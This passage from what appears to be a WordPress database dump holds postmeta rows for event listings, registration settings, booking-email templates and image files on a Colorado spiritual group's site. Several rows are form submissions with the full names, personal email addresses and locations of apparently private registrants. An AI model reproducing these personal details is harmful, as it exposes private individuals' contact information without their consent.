EventTimezone\";i:1615406618;s:18:\"_EventTimezoneAbbr\";i:1615407339;s:27:\"_EventNextPendingRecurrence\";i:1615406618;s:26:\"_RTECregistrationsDisabled\";i:1615406618;s:17:\"_RTECdeadlineType\";i:1615406618;s:19:\"_RTECwhoCanRegister\";i:1615406618;s:23:\"_RTEClimitRegistrations\";i:1615406618;s:21:\"_RTECmaxRegistrations\";i:1615406618;s:16:\"_EventRecurrence\";i:1615406618;s:18:\"_RTECnumRegistered\";i:1615406618;s:13:\"_EventVenueID\";i:1615406618;s:12:\"_dp_original\";i:1615406618;s:10:\"_edit_last\";i:1615406780;s:10:\"post_title\";i:1615406856;s:12:\"post_content\";i:1616530908;s:16:\"tribe_events_cat\";i:1617223913;s:11:\"post_status\";i:1615407339;}'),(134812,264126,'_EventEndDateUTC','2021-05-15 20:00:00'),(134787,264126,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1615406618;s:12:\"_EventOrigin\";i:1615406618;s:13:\"_thumbnail_id\";i:1615407339;s:24:\"boldgrid_hide_page_title\";i:1615406618;s:17:\"_EventShowMapLink\";i:1615406618;s:13:\"_EventShowMap\";i:1615406618;s:15:\"_EventStartDate\";i:1617202313;s:13:\"_EventEndDate\";i:1617202313;s:18:\"_EventStartDateUTC\";i:1617202313;s:16:\"_EventEndDateUTC\";i:1617202313;s:14:\"_EventDuration\";i:1615406618;s:20:\"_EventCurrencySymbol\";i:1615406618;s:22:\"_EventCurrencyPosition\";i:1615406618;s:10:\"_EventCost\";i:1615406618;s:9:\"_EventURL\";i:1615406618;s:14:\"_EventTimezone\";i:1615406618;s:18:\"_EventTimezoneAbbr\";i:1615407339;s:27:\"_EventNextPendingRecurrence\";i:1615406618;s:26:\"_RTECregistrationsDisabled\";i:1615406618;s:17:\"_RTECdeadlineType\";i:1615406618;s:19:\"_RTECwhoCanRegister\";i:1615406618;s:23:\"_RTEClimitRegistrations\";i:1615406618;s:21:\"_RTECmaxRegistrations\";i:1615406618;s:16:\"_EventRecurrence\";i:1615406618;s:18:\"_RTECnumRegistered\";i:1615406618;s:13:\"_EventVenueID\";i:1615406618;s:12:\"_dp_original\";i:1615406618;s:10:\"_edit_last\";i:1615406780;s:10:\"post_title\";i:1615406856;s:12:\"post_content\";i:1616530908;s:16:\"tribe_events_cat\";i:1617223913;s:11:\"post_status\";i:1615407339;}'),(134811,264126,'_EventStartDateUTC','2021-05-15 19:00:00'),(134817,264126,'_EventURL',''),(134818,264126,'_EventTimezone','America/Denver'),(134788,264126,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1615406618;s:12:\"_EventOrigin\";i:1615406618;s:13:\"_thumbnail_id\";i:1615407339;s:24:\"boldgrid_hide_page_title\";i:1615406618;s:17:\"_EventShowMapLink\";i:1615406618;s:13:\"_EventShowMap\";i:1615406618;s:15:\"_EventStartDate\";i:1617202313;s:13:\"_EventEndDate\";i:1617202313;s:18:\"_EventStartDateUTC\";i:1617202313;s:16:\"_EventEndDateUTC\";i:1617202313;s:14:\"_EventDuration\";i:1615406618;s:20:\"_EventCurrencySymbol\";i:1615406618;s:22:\"_EventCurrencyPosition\";i:1615406618;s:10:\"_EventCost\";i:1615406618;s:9:\"_EventURL\";i:1615406618;s:14:\"_EventTimezone\";i:1615406618;s:18:\"_EventTimezoneAbbr\";i:1615407339;s:27:\"_EventNextPendingRecurrence\";i:1615406618;s:26:\"_RTECregistrationsDisabled\";i:1615406618;s:17:\"_RTECdeadlineType\";i:1615406618;s:19:\"_RTECwhoCanRegister\";i:1615406618;s:23:\"_RTEClimitRegistrations\";i:1615406618;s:21:\"_RTECmaxRegistrations\";i:1615406618;s:16:\"_EventRecurrence\";i:1615406618;s:18:\"_RTECnumRegistered\";i:1615406618;s:13:\"_EventVenueID\";i:1615406618;s:12:\"_dp_original\";i:1615406618;s:10:\"_edit_last\";i:1615406780;s:10:\"post_title\";i:1615406856;s:12:\"post_content\";i:1616530908;s:16:\"tribe_events_cat\";i:1617223913;s:11:\"post_status\";i:1615407339;}'),(134810,264126,'_EventEndDate','2021-05-15 14:00:00'),(134819,264126,'_EventTimezoneAbbr','MDT'),(134789,264126,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1615406618;s:12:\"_EventOrigin\";i:1615406618;s:13:\"_thumbnail_id\";i:1615407339;s:24:\"boldgrid_hide_page_title\";i:1615406618;s:17:\"_EventShowMapLink\";i:1615406618;s:13:\"_EventShowMap\";i:1615406618;s:15:\"_EventStartDate\";i:1617202313;s:13:\"_EventEndDate\";i:1617202313;s:18:\"_EventStartDateUTC\";i:1617202313;s:16:\"_EventEndDateUTC\";i:1617202313;s:14:\"_EventDuration\";i:1615406618;s:20:\"_EventCurrencySymbol\";i:1615406618;s:22:\"_EventCurrencyPosition\";i:1615406618;s:10:\"_EventCost\";i:1615406618;s:9:\"_EventURL\";i:1615406618;s:14:\"_EventTimezone\";i:1615406618;s:18:\"_EventTimezoneAbbr\";i:1615407339;s:27:\"_EventNextPendingRecurrence\";i:1615406618;s:26:\"_RTECregistrationsDisabled\";i:1615406618;s:17:\"_RTECdeadlineType\";i:1615406618;s:19:\"_RTECwhoCanRegister\";i:1615406618;s:23:\"_RTEClimitRegistrations\";i:1615406618;s:21:\"_RTECmaxRegistrations\";i:1615406618;s:16:\"_EventRecurrence\";i:1615406618;s:18:\"_RTECnumRegistered\";i:1615406618;s:13:\"_EventVenueID\";i:1615406618;s:12:\"_dp_original\";i:1615406618;s:10:\"_edit_last\";i:1615406780;s:10:\"post_title\";i:1615406856;s:12:\"post_content\";i:1616530908;s:16:\"tribe_events_cat\";i:1617223913;s:11:\"post_status\";i:1615407339;}'),(134809,264126,'_EventStartDate','2021-05-15 13:00:00'),(134820,264126,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(134790,264126,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1615406618;s:12:\"_EventOrigin\";i:1615406618;s:13:\"_thumbnail_id\";i:1615407339;s:24:\"boldgrid_hide_page_title\";i:1615406618;s:17:\"_EventShowMapLink\";i:1615406618;s:13:\"_EventShowMap\";i:1615406618;s:15:\"_EventStartDate\";i:1617202313;s:13:\"_EventEndDate\";i:1617202313;s:18:\"_EventStartDateUTC\";i:1617202313;s:16:\"_EventEndDateUTC\";i:1617202313;s:14:\"_EventDuration\";i:1615406618;s:20:\"_EventCurrencySymbol\";i:1615406618;s:22:\"_EventCurrencyPosition\";i:1615406618;s:10:\"_EventCost\";i:1615406618;s:9:\"_EventURL\";i:1615406618;s:14:\"_EventTimezone\";i:1615406618;s:18:\"_EventTimezoneAbbr\";i:1615407339;s:27:\"_EventNextPendingRecurrence\";i:1615406618;s:26:\"_RTECregistrationsDisabled\";i:1615406618;s:17:\"_RTECdeadlineType\";i:1615406618;s:19:\"_RTECwhoCanRegister\";i:1615406618;s:23:\"_RTEClimitRegistrations\";i:1615406618;s:21:\"_RTECmaxRegistrations\";i:1615406618;s:16:\"_EventRecurrence\";i:1615406618;s:18:\"_RTECnumRegistered\";i:1615406618;s:13:\"_EventVenueID\";i:1615406618;s:12:\"_dp_original\";i:1615406618;s:10:\"_edit_last\";i:1615406780;s:10:\"post_title\";i:1615406856;s:12:\"post_content\";i:1616530908;s:16:\"tribe_events_cat\";i:1617223913;s:11:\"post_status\";i:1615407339;}'),(134808,264126,'_EventShowMap',''),(134821,264126,'_RTECregistrationsDisabled','1'),(134791,264126,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1615406618;s:12:\"_EventOrigin\";i:1615406618;s:13:\"_thumbnail_id\";i:1615407339;s:24:\"boldgrid_hide_page_title\";i:1615406618;s:17:\"_EventShowMapLink\";i:1615406618;s:13:\"_EventShowMap\";i:1615406618;s:15:\"_EventStartDate\";i:1617202313;s:13:\"_EventEndDate\";i:1617202313;s:18:\"_EventStartDateUTC\";i:1617202313;s:16:\"_EventEndDateUTC\";i:1617202313;s:14:\"_EventDuration\";i:1615406618;s:20:\"_EventCurrencySymbol\";i:1615406618;s:22:\"_EventCurrencyPosition\";i:1615406618;s:10:\"_EventCost\";i:1615406618;s:9:\"_EventURL\";i:1615406618;s:14:\"_EventTimezone\";i:1615406618;s:18:\"_EventTimezoneAbbr\";i:1615407339;s:27:\"_EventNextPendingRecurrence\";i:1615406618;s:26:\"_RTECregistrationsDisabled\";i:1615406618;s:17:\"_RTECdeadlineType\";i:1615406618;s:19:\"_RTECwhoCanRegister\";i:1615406618;s:23:\"_RTEClimitRegistrations\";i:1615406618;s:21:\"_RTECmaxRegistrations\";i:1615406618;s:16:\"_EventRecurrence\";i:1615406618;s:18:\"_RTECnumRegistered\";i:1615406618;s:13:\"_EventVenueID\";i:1615406618;s:12:\"_dp_original\";i:1615406618;s:10:\"_edit_last\";i:1615406780;s:10:\"post_title\";i:1615406856;s:12:\"post_content\";i:1616530908;s:16:\"tribe_events_cat\";i:1617223913;s:11:\"post_status\";i:1615407339;}'),(134807,264126,'_EventShowMapLink',''),(134822,264126,'_RTECdeadlineType','start'),(134792,264126,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1615406618;s:12:\"_EventOrigin\";i:1615406618;s:13:\"_thumbnail_id\";i:1615407339;s:24:\"boldgrid_hide_page_title\";i:1615406618;s:17:\"_EventShowMapLink\";i:1615406618;s:13:\"_EventShowMap\";i:1615406618;s:15:\"_EventStartDate\";i:1617202313;s:13:\"_EventEndDate\";i:1617202313;s:18:\"_EventStartDateUTC\";i:1617202313;s:16:\"_EventEndDateUTC\";i:1617202313;s:14:\"_EventDuration\";i:1615406618;s:20:\"_EventCurrencySymbol\";i:1615406618;s:22:\"_EventCurrencyPosition\";i:1615406618;s:10:\"_EventCost\";i:1615406618;s:9:\"_EventURL\";i:1615406618;s:14:\"_EventTimezone\";i:1615406618;s:18:\"_EventTimezoneAbbr\";i:1615407339;s:27:\"_EventNextPendingRecurrence\";i:1615406618;s:26:\"_RTECregistrationsDisabled\";i:1615406618;s:17:\"_RTECdeadlineType\";i:1615406618;s:19:\"_RTECwhoCanRegister\";i:1615406618;s:23:\"_RTEClimitRegistrations\";i:1615406618;s:21:\"_RTECmaxRegistrations\";i:1615406618;s:16:\"_EventRecurrence\";i:1615406618;s:18:\"_RTECnumRegistered\";i:1615406618;s:13:\"_EventVenueID\";i:1615406618;s:12:\"_dp_original\";i:1615406618;s:10:\"_edit_last\";i:1615406780;s:10:\"post_title\";i:1615406856;s:12:\"post_content\";i:1616530908;s:16:\"tribe_events_cat\";i:1617223913;s:11:\"post_status\";i:1615407339;}'),(134806,264126,'boldgrid_hide_page_title','0'),(134823,264126,'_RTECwhoCanRegister','any'),(134793,264126,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1615406618;s:12:\"_EventOrigin\";i:1615406618;s:13:\"_thumbnail_id\";i:1615407339;s:24:\"boldgrid_hide_page_title\";i:1615406618;s:17:\"_EventShowMapLink\";i:1615406618;s:13:\"_EventShowMap\";i:1615406618;s:15:\"_EventStartDate\";i:1617202313;s:13:\"_EventEndDate\";i:1617202313;s:18:\"_EventStartDateUTC\";i:1617202313;s:16:\"_EventEndDateUTC\";i:1617202313;s:14:\"_EventDuration\";i:1615406618;s:20:\"_EventCurrencySymbol\";i:1615406618;s:22:\"_EventCurrencyPosition\";i:1615406618;s:10:\"_EventCost\";i:1615406618;s:9:\"_EventURL\";i:1615406618;s:14:\"_EventTimezone\";i:1615406618;s:18:\"_EventTimezoneAbbr\";i:1615407339;s:27:\"_EventNextPendingRecurrence\";i:1615406618;s:26:\"_RTECregistrationsDisabled\";i:1615406618;s:17:\"_RTECdeadlineType\";i:1615406618;s:19:\"_RTECwhoCanRegister\";i:1615406618;s:23:\"_RTEClimitRegistrations\";i:1615406618;s:21:\"_RTECmaxRegistrations\";i:1615406618;s:16:\"_EventRecurrence\";i:1615406618;s:18:\"_RTECnumRegistered\";i:1615406618;s:13:\"_EventVenueID\";i:1615406618;s:12:\"_dp_original\";i:1615406618;s:10:\"_edit_last\";i:1615406780;s:10:\"post_title\";i:1615406856;s:12:\"post_content\";i:1616530908;s:16:\"tribe_events_cat\";i:1617223913;s:11:\"post_status\";i:1615407339;}'),(134795,264126,'_EventOrigin','events-calendar'),(134796,264126,'_EventOrigin','events-calendar'),(134797,264126,'_EventOrigin','events-calendar'),(134798,264126,'_EventOrigin','events-calendar'),(134799,264126,'_EventOrigin','events-calendar'),(134800,264126,'_EventOrigin','events-calendar'),(134801,264126,'_EventOrigin','events-calendar'),(134802,264126,'_EventOrigin','events-calendar'),(134803,264126,'_EventOrigin','events-calendar'),(134804,264126,'_EventOrigin','events-calendar'),(134805,264126,'_thumbnail_id','264127'),(134794,264126,'_EventOrigin','events-calendar'),(134824,264126,'_RTEClimitRegistrations','0'),(134825,264126,'_RTECmaxRegistrations','30'),(134826,264126,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(134827,264126,'_RTECnumRegistered','0'),(134828,264126,'_EventVenueID','262435'),(134830,264126,'_dp_original','263641'),(134831,264126,'_edit_lock','1619293015:2'),(134832,264126,'_edit_last','2'),(134833,264127,'_wp_attached_file','2021/03/universe-rose.jpg'),(134834,264127,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:546;s:6:\"height\";i:307;s:4:\"file\";s:25:\"2021/03/universe-rose.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"universe-rose-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"universe-rose-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"universe-rose-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(144811,265267,'mec_countdown_method','global'),(144810,265267,'mec_start_time_hour','3'),(144809,265267,'mec_start_date','2021-08-16'),(144808,265267,'mec_public','1'),(144807,265267,'mec_start_time_minutes','0'),(144806,265267,'mec_start_time_ampm','PM'),(144805,265267,'mec_start_day_seconds','54000'),(144804,265267,'mec_end_date','2021-08-16'),(144803,265267,'mec_end_time_hour','4'),(144802,265267,'mec_end_time_minutes','0'),(144801,265267,'mec_end_time_ampm','PM'),(144800,265267,'mec_end_day_seconds','57600'),(144799,265267,'mec_repeat_status','0'),(144798,265267,'mec_repeat_type',''),(144797,265267,'mec_more_info',''),(144796,265267,'mec_read_more',''),(144795,265267,'mec_organizer_id','1'),(144794,265267,'mec_more_info_title',''),(144793,265267,'mec_more_info_target','_self'),(144792,265267,'mec_cost',''),(144791,265267,'mec_additional_location_ids','a:0:{}'),(144790,265267,'mec_additional_organizer_ids','a:0:{}'),(144789,265267,'mec_currency','a:0:{}'),(144788,265267,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-08-16\";s:4:\"hour\";s:1:\"3\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-08-16\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(144787,265267,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(144786,265267,'boldgrid_hide_page_title','0'),(144785,265267,'mec_display_cancellation_reason_in_single_page',''),(144784,265267,'mec_cancelled_reason',''),(144783,265267,'mec_moved_online_link',''),(144782,265265,'_seq_num','131'),(144781,265265,'_form_id','21'),(144780,265265,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(144779,265265,'_field_228','US'),(144778,265265,'_field_227','CO'),(144777,265265,'_field_226','tulsamango@hotmail.com'),(144776,265265,'_field_225','S'),(144775,265265,'_field_224','Debra'),(144774,265264,'_seq_num','8'),(144773,265264,'_form_id','48'),(144772,265264,'_field_448','jartzchongrh@live.com'),(144771,265264,'_field_447','Heassler'),(144770,265264,'_field_446','Reid'),(144712,265248,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:74400;s:12:\"smushed-size\";i:70470;s:15:\"savings-percent\";d:5.28000000000000024868995751603506505489349365234375;}'),(144711,265248,'smush-info','The file was compressed from 72.66 KB to 68.82 KB saving 5.28 percent using WP-Optimize'),(144710,265248,'smush-complete','1'),(144709,265248,'original-file','2021/07/green-trees-1-updraft-pre-smush-original.jpg'),(144708,265250,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:41472;s:12:\"smushed-size\";i:40441;s:15:\"savings-percent\";d:2.4900000000000002131628207280300557613372802734375;}'),(144707,265250,'smush-info','The file was compressed from 40.50 KB to 39.49 KB saving 2.49 percent using WP-Optimize'),(144706,265250,'smush-complete','1'),(144705,265250,'original-file','2021/07/child-laughing-1-updraft-pre-smush-original.jpg'),(144704,265250,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:612;s:6:\"height\";i:344;s:4:\"file\";s:28:\"2021/07/child-laughing-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"child-laughing-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"child-laughing-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:28:\"child-laughing-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:28:\"child-laughing-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:28:\"child-laughing-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:28:\"child-laughing-1-300x344.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"child-laughing-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(144703,265250,'_wp_attached_file','2021/07/child-laughing-1.jpg'),(144702,265249,'_thumbnail_id','265250'),(144701,265249,'_edit_last','2'),(144700,265249,'_edit_lock','1627432081:2'),(144699,265249,'protect_children',''),(144698,265249,'mec_color',''),(144697,265249,'mec_location_id','118'),(144696,265249,'mec_dont_show_map','0'),(144695,265249,'mec_certain_weekdays','a:0:{}'),(144694,265249,'mec_allday','0'),(144693,265249,'mec_repeat_interval','1'),(144692,265249,'mec_repeat_end',''),(144691,265249,'mec_repeat_end_at_occurrences',''),(144690,265249,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(144689,265249,'passster_activate_protection',NULL),(144688,265249,'passster_activate_global_protection',NULL),(144687,265249,'passster_protection_type','password'),(144686,265249,'mec_advanced_days','a:0:{}'),(144685,265249,'mec_repeat_end_at_date',''),(144684,265249,'mec_in_days',''),(144683,265249,'mec_not_in_days',''),(144682,265249,'mec_hourly_schedules','a:0:{}'),(144681,265249,'mec_fees_global_inheritance','1'),(144680,265249,'mec_tickets','a:0:{}'),(144679,265249,'mec_booking','a:0:{}'),(144678,265249,'mec_fees','a:0:{}'),(137209,264374,'_EventDuration','32400'),(137210,264374,'_EventCurrencySymbol',''),(144677,265249,'mec_ticket_variations_global_inheritance','1'),(144676,265249,'mec_ticket_variations','a:0:{}'),(144675,265249,'mec_reg_fields_global_inheritance','1'),(144674,265249,'mec_reg_fields','a:0:{}'),(144673,265249,'mec_bfixed_fields','a:0:{}'),(144672,265249,'mec_op','a:0:{}'),(137223,264379,'protect_children',''),(137264,264379,'_RTECnumRegistered','1'),(137249,264379,'_edit_lock','1619289176:2'),(144671,265249,'mec_fields','a:0:{}'),(144670,265249,'mec_event_status','EventScheduled'),(144669,265249,'mec_hide_end_time','0'),(144668,265249,'mec_hide_time','0'),(144667,265249,'one_occurrence','0'),(144666,265249,'mec_comment',''),(144665,265249,'mec_timezone','global'),(144664,265249,'mec_countdown_method','global'),(144663,265249,'mec_start_time_hour','10'),(144662,265249,'mec_start_date','2021-08-22'),(144661,265249,'mec_public','1'),(144660,265249,'mec_start_time_minutes','30'),(144659,265249,'mec_start_time_ampm','AM'),(144658,265249,'mec_start_day_seconds','37800'),(144657,265249,'mec_end_date','2021-08-22'),(144656,265249,'mec_end_time_hour','11'),(144655,265249,'mec_end_time_minutes','30'),(144654,265249,'mec_end_time_ampm','PM'),(144653,265249,'mec_end_day_seconds','84600'),(144652,265249,'mec_repeat_status','0'),(144651,265249,'mec_repeat_type',''),(144650,265249,'mec_more_info',''),(144649,265249,'mec_read_more',''),(144648,265249,'mec_organizer_id','1'),(144647,265249,'mec_more_info_title',''),(144646,265249,'mec_more_info_target','_self'),(144645,265249,'mec_cost',''),(144644,265249,'mec_additional_location_ids','a:0:{}'),(144643,265249,'mec_additional_organizer_ids','a:0:{}'),(144642,265249,'mec_currency','a:0:{}'),(144641,265249,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-08-22\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-08-22\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(144640,265249,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(144639,265249,'boldgrid_hide_page_title','0'),(144638,265249,'mec_display_cancellation_reason_in_single_page',''),(144637,265249,'mec_cancelled_reason',''),(144636,265249,'mec_moved_online_link',''),(135147,264153,'_field_224','Brigitte'),(135148,264153,'_field_225','Kickbusch'),(135149,264153,'_field_226','light@hubriki.de'),(135150,264153,'_field_227','CO'),(135151,264153,'_field_228','DE'),(135152,264153,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(135153,264153,'_form_id','21'),(135154,264153,'_seq_num','121'),(135155,264154,'_field_224','Samuel'),(135156,264154,'_field_225','Cole'),(135157,264154,'_field_226','samuel30030@att.net'),(135158,264154,'_field_227','CO'),(135159,264154,'_field_228','US'),(135160,264154,'_field_229','a:1:{i:0;s:8:\"Loveland\";}'),(135161,264154,'_form_id','21'),(135162,264154,'_seq_num','122'),(144635,265248,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:633;s:6:\"height\";i:356;s:4:\"file\";s:25:\"2021/07/green-trees-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"green-trees-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"green-trees-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:25:\"green-trees-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:25:\"green-trees-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:25:\"green-trees-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:25:\"green-trees-1-300x356.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:356;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"green-trees-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(144634,265248,'_wp_attached_file','2021/07/green-trees-1.jpg'),(144633,265245,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:25709;s:12:\"smushed-size\";i:24754;s:15:\"savings-percent\";d:3.70999999999999996447286321199499070644378662109375;}'),(144632,265245,'smush-info','The file was compressed from 25.11 KB to 24.17 KB saving 3.71 percent using WP-Optimize'),(144631,265245,'smush-complete','1'),(144630,265245,'original-file','2021/07/girl-eagle-1-updraft-pre-smush-original.jpg'),(144629,265247,'_thumbnail_id','265248'),(144628,265247,'_edit_last','2'),(144627,265247,'_edit_lock','1627431550:2'),(144626,265247,'protect_children',''),(144625,265247,'mec_color',''),(144624,265247,'mec_location_id','118'),(144623,265247,'mec_dont_show_map','0'),(144622,265247,'mec_certain_weekdays','a:0:{}'),(144621,265247,'mec_allday','0'),(144620,265247,'mec_repeat_interval','1'),(144619,265247,'mec_repeat_end',''),(144618,265247,'mec_repeat_end_at_occurrences',''),(135202,264172,'_field_30','Joan'),(135203,264172,'_field_31','Riester'),(135204,264172,'_field_32','(719) 